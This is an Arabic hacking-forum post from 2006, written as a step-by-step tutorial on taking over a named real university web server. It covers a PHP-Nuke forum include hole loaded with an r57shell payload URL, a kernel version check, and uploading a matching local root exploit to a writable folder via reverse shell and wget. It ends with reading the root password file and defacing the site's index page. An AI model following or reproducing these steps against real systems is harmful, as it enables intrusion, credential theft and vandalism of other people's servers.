درس عملى لاخذ روت وبالصور بعد - hacking collection

Members Login

Post Info

TOPIC: درس عملى لاخذ روت وبالصور بعد

Anonymous

Date: Tue Jun 27 23:55:14 2006

درس عملى لاخذ روت وبالصور بعد	Permalink

السلام عليكم ورحمة الله وبركاته,,, اسعد الله اوقاتكم بالخير والمسرات ,, اولا حبيت اعتذر عن انقطاعي عن كتابه المواضيع وذلك لانشغالي بأمور خارجه عن ارادتي .... مالكم في كثر الكلام ........ اليوم درسنا نتعلم وشلون ندخل للموقع ونتدرج الى ان نوصل للروت لايجي واحد يقول وش الروت <-- اللي مايعرف وش الروت يروح يشفر باتش ازين له ,, الموقع اللي راح نطبق عليه ارسله لي عضو طيب اسمه ( السنافي ) كان يبي باسورد الاف تي بي لكن اخذت الاذن منه ان نشرح طريقه الروت على هذا الموقع لاني لاملك الوقت للبحث عن مواقع ,, يالله جاهزين؟ .. بسم الله ,, اولا : قدامنا هدف وهو مثلا ذا الموقع http://cmts.cmm.msu.ru/site/ نلاحظ انه مركب مجله نيوك ,, ومثل ماتعلمنا بالدروس السابقه انك تفحص وتشوف السكربتات على الموقع مثل النيوك وغيرها وتدور لها ثغرات ,, طيب هنا الموقع مركب نيوك والنيوك مركب بداخلها منتدى وهذا المنتدى يحتوي على ثغره انكلود وهذا الاستثمار لها http://cmts.cmm.msu.ru/site/modules/.../r57shell.txt? حلو الحين دخلنا الشل وحنا موجودين بالمسار هذا /var/www/html/site/modules/Forums/admin الان نشوف فوق اصدر اللينكس الكيرنل تبعه ولو كتبت الامر uname -a تطلع لك المعلومات Linux radiospec 2.4.20-9asp #1 Tue Apr 29 22:46:49 MSD 2003 وهذا الناتج زي ماشفتو : الكيرنل : 2.4.20 تحديث : 2003 الان انت على الشل وعرفت رقم الاصدار وتبي تصير روت اكيد راح تجيب لوكال روت مناسب لهذا الاصدار ادخل الموضوع هذا وراح يفيدك http://www.3asfh.net/vb/showthread.php?t=39582 بعد ماتكون جبت الوكلات المناسبه ,, شوف الوكال اللي ناسب الاصدار 2.4.20 بعد ماتجيبه ارفعه لاي مجلد يحمل التصريح 777 ,, تقول كيف اقولك دور بمجلدات الموقع على مجلد يكون جنبه drwxrwxrwx واذا ماحصلت تقدر ترفعه للتمب الي هو على المسار هذا /tmp بس اكثر السيرفرات يمنعون التنفيذ داخل هذا المجلد وفي هذا السيرفر حصلت مجلد وهو على هذا المسار /var/www/html/site/modules/Gallery بعد ماتدخل له تعمل اتصال عكسي عشان تدخل الشل وهذا الشرح للاتصال العكسي كامل http://www.3asfh.net/vb/showthread.php?t=42702 بعد ما تكون اتصلت وشبكت على الشل ترفع له الوكال روت للمجلد اللي انت فيه سواءا عن طريق الشل الروسي استعراض وبعدين رفع او عن طريق الامر wget بعد ماتسحبه ,, تشغله ,, وتشوف صلاحياتك كيف صارت وهذي صور توضيحيه هنا الصوره الاولى سحبنا الوكال روت (الاكسبلويت) هنا الصوره الثانيه حصلنا على الروت بعد تطبيق الاكسبلوت وتلاحضون كيف استعرضنا الحاله ودخلنا بالروت وعرضنا ملف الباسوردات وشفنا باسورد الروت من ضمنها ,, هنا دخلنا على المجلد الرئيسي للموقع وسحبنا الاندكس ,, وزي ماتشوفون في الصوره التاليه تغيرت واجهه الموقع ,, وتقدر ايضا تغير واجهه كل المواقع اللي على السيرفر,, http://cmts.cmm.msu.ru/ اعذروني على الشرح السريع والمستعجل ,, بس تعرفون خميس واتصال بطئ بهذلني وطفشني تحيات اخوكم __________________

Page 1 of 1 sorted by

Add/remove tags to this thread

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse